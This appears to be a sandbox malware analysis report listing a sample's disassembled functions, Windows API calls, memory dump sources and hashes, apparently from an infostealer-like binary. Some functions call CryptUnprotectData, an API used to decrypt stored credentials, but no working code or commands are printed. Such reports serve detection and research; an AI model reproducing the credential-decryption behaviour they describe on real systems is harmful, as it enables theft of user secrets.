                                    • Instruction ID: c725b93e3a8e45b763f75b7695d574ad3c636c73b48c969d33f1c175c0043550
                                    • Opcode Fuzzy Hash: f5cf04dc6f3f3a7108866edd13ca58d52a0560109c7e921021977e9ea992771d
                                    • Instruction Fuzzy Hash: 8EF01D707523226BE7701FA4BC49F567BA8EF45B51F200115FA49EA2D0D7B09C80CAA4
                                    Function 000BCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(000CB110,00000000,00000001,000CB100,?), ref: 000BCB06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 000BCB46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 000BCBC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: c1faa9b6a5485bd8d7f63eacc5d00a0361a1e3136b0bad0d0079b820dddc0a65
                                    • Instruction ID: 7446ac0dbd930711560108ac493f45f27d9e5ff5d458360bef79fa56e19b336d
                                    • Opcode Fuzzy Hash: c1faa9b6a5485bd8d7f63eacc5d00a0361a1e3136b0bad0d0079b820dddc0a65
                                    • Instruction Fuzzy Hash: 5D311271A40615AFD710DB98CC96FAEB7B9DB88B10F104194FA14EB2D0D7B1AE45CB90
                                    Function 000A9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000A9B9F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000A9BB3
                                    • LocalFree.KERNEL32(?), ref: 000A9BD7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 4a12269f165fdba68d193f2a94574ab47607d3352cefa56790f0da780bb991a1
                                    • Instruction ID: 42f4d5ad108aedd371dcdefacb427fec975087058be02f85261d3eb6f03c7ebe
                                    • Opcode Fuzzy Hash: 4a12269f165fdba68d193f2a94574ab47607d3352cefa56790f0da780bb991a1
                                    • Instruction Fuzzy Hash: 8E011275E41309ABD7109BA4DC49FAEB778EB44701F104555FA04AB284DB749D00C7E0
                                    Function 00456C01 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C3{5$Xh[
                                    • API String ID: 0-2274618491
                                    • Opcode ID: a60416b84ca526d4662d0d5d2eecf8a1ddded4a15d87a0e5fb37e8ba2ad18c2b
                                    • Instruction ID: 416eae0791622bd5a1941b2a3d50340eeb7ee04d8e429e7a1b30c6bdcc2a39eb
                                    • Opcode Fuzzy Hash: a60416b84ca526d4662d0d5d2eecf8a1ddded4a15d87a0e5fb37e8ba2ad18c2b
                                    • Instruction Fuzzy Hash: B571F5F361C2049FE7016E2EEC8576ABBE9EFD8620F16453DE6C4C3744EA3158058693
                                    Function 004582C0 Relevance: 1.8, Strings: 1, Instructions: 597COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,l;
                                    • API String ID: 0-1649111933
                                    • Opcode ID: 7fec594b06542c4ecef346af88dc62cd7f040957f92a7ff95029411f7ab398c0
                                    • Instruction ID: 0809757dd1d21d220b9e7bb9d120c93435ad22d99d7f76d11f98a0b01c4329ca
                                    • Opcode Fuzzy Hash: 7fec594b06542c4ecef346af88dc62cd7f040957f92a7ff95029411f7ab398c0
                                    • Instruction Fuzzy Hash: 240219F3A082149FE7146E1DDC8577ABBE9EF94320F16493DEAC8C3744EA3598048796
                                    Function 003D4636 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: g>$+
                                    • API String ID: 0-4095000794
                                    • Opcode ID: 5e5471d2bb1a524a625734bfeb1123b26802e0c903c88f10000002a9fbf6a317
                                    • Instruction ID: 051539becc884904cef01c7fabd4c992f3a0e61ce53d5112c392d6dc22001c90
                                    • Opcode Fuzzy Hash: 5e5471d2bb1a524a625734bfeb1123b26802e0c903c88f10000002a9fbf6a317
                                    • Instruction Fuzzy Hash: 1451DEF29086049BE300BE29DC4572AF7E5EFA4710F1A893CDAD583340FA35A9558A87
                                    Function 003C42DB Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Aq2X
                                    • API String ID: 0-3743379348
                                    • Opcode ID: 6c6ec8a6f1a4b58032ebc1141158ab66b79ae822410c5a1aa824d9be094b0716
                                    • Instruction ID: 66fff6dbbf17736bbef3540a7ea7b346ec91f692c78f6a9494acd9241ef4dee2
                                    • Opcode Fuzzy Hash: 6c6ec8a6f1a4b58032ebc1141158ab66b79ae822410c5a1aa824d9be094b0716
                                    • Instruction Fuzzy Hash: 1031F2F3E045105BF7089929ED9973676DADBE0720F2A423E9B59973C0E87D8C054298
                                    Function 00309095 Relevance: .1, Instructions: 146COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b744acc1101288928b3875652bdcb85eb266c492b6192fcf7b88b1526c6ed8ef
                                    • Instruction ID: 297b112dd43d8a0374f5b65012923a7f1e60df4d931ec0b960354eec72af31e7
                                    • Opcode Fuzzy Hash: b744acc1101288928b3875652bdcb85eb266c492b6192fcf7b88b1526c6ed8ef
                                    • Instruction Fuzzy Hash: 1F414CF390C3189BD3046E2CEDC5767FBDAEBA4220F29463DDA8593740EA3669058587
                                    Function 00509F01 Relevance: .1, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56ea656ae946bc8b4034e1b00e52360752974252a0f104aa8270906663db70f7
                                    • Instruction ID: d75dc04e3efec79023392154e63bc754e9353e66d83e4f63c752886867d10b78
                                    • Opcode Fuzzy Hash: 56ea656ae946bc8b4034e1b00e52360752974252a0f104aa8270906663db70f7
                                    • Instruction Fuzzy Hash: 6E3168F321C606DFE305593DED55B7EBB9ABBD4720F3A8B2DA282C2BD8E53448015512
                                    Function 003A34EC Relevance: .1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5390f5c9042800698c0535362c7f6d3465c31678d6ea2534759f51ae2b5a8287
                                    • Instruction ID: 62352029ef0d8765d7cf7488b6bcbd9978d12b4295f898e21c6cd4c9c890feea
                                    • Opcode Fuzzy Hash: 5390f5c9042800698c0535362c7f6d3465c31678d6ea2534759f51ae2b5a8287
                                    • Instruction Fuzzy Hash: 0F21F6F3D185104FF3545D39DC4A72BB6D65B60720F2B463DDE84D7BC0E97899018686
                                    Function 004C07F5 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27abeee1ef2fb7ff0398b536df204f429a76b0884c1f13dc95d243422c287789
                                    • Instruction ID: ad11c9497f54e2bae8fe91cba16917c89f68db5731d7bced1d0c63a43f7b9b48
                                    • Opcode Fuzzy Hash: 27abeee1ef2fb7ff0398b536df204f429a76b0884c1f13dc95d243422c287789
                                    • Instruction Fuzzy Hash: D63101B210C704DFD7467F29D88266EFBE0EF68350F16482CD2D582610E7399484CB4B
                                    Function 000B85B0 Relevance: 72.4, APIs: 45, Strings: 3, Instructions: 449stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B8636
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B866D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 000B86AA
                                    • StrStrA.SHLWAPI(?,00E6DD20), ref: 000B86CF
                                    • lstrcpyn.KERNEL32(002D93D0,?,00000000), ref: 000B86EE
                                    • lstrlen.KERNEL32(?), ref: 000B8701
                                    • wsprintfA.USER32 ref: 000B8711
                                    • lstrcpy.KERNEL32(?,?), ref: 000B8727
                                    • StrStrA.SHLWAPI(?,00E6E008), ref: 000B8754
                                    • lstrcpy.KERNEL32(?,002D93D0), ref: 000B87B4
                                    • StrStrA.SHLWAPI(?,00E6E0C8), ref: 000B87E1
                                    • lstrcpyn.KERNEL32(002D93D0,?,00000000), ref: 000B8800
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
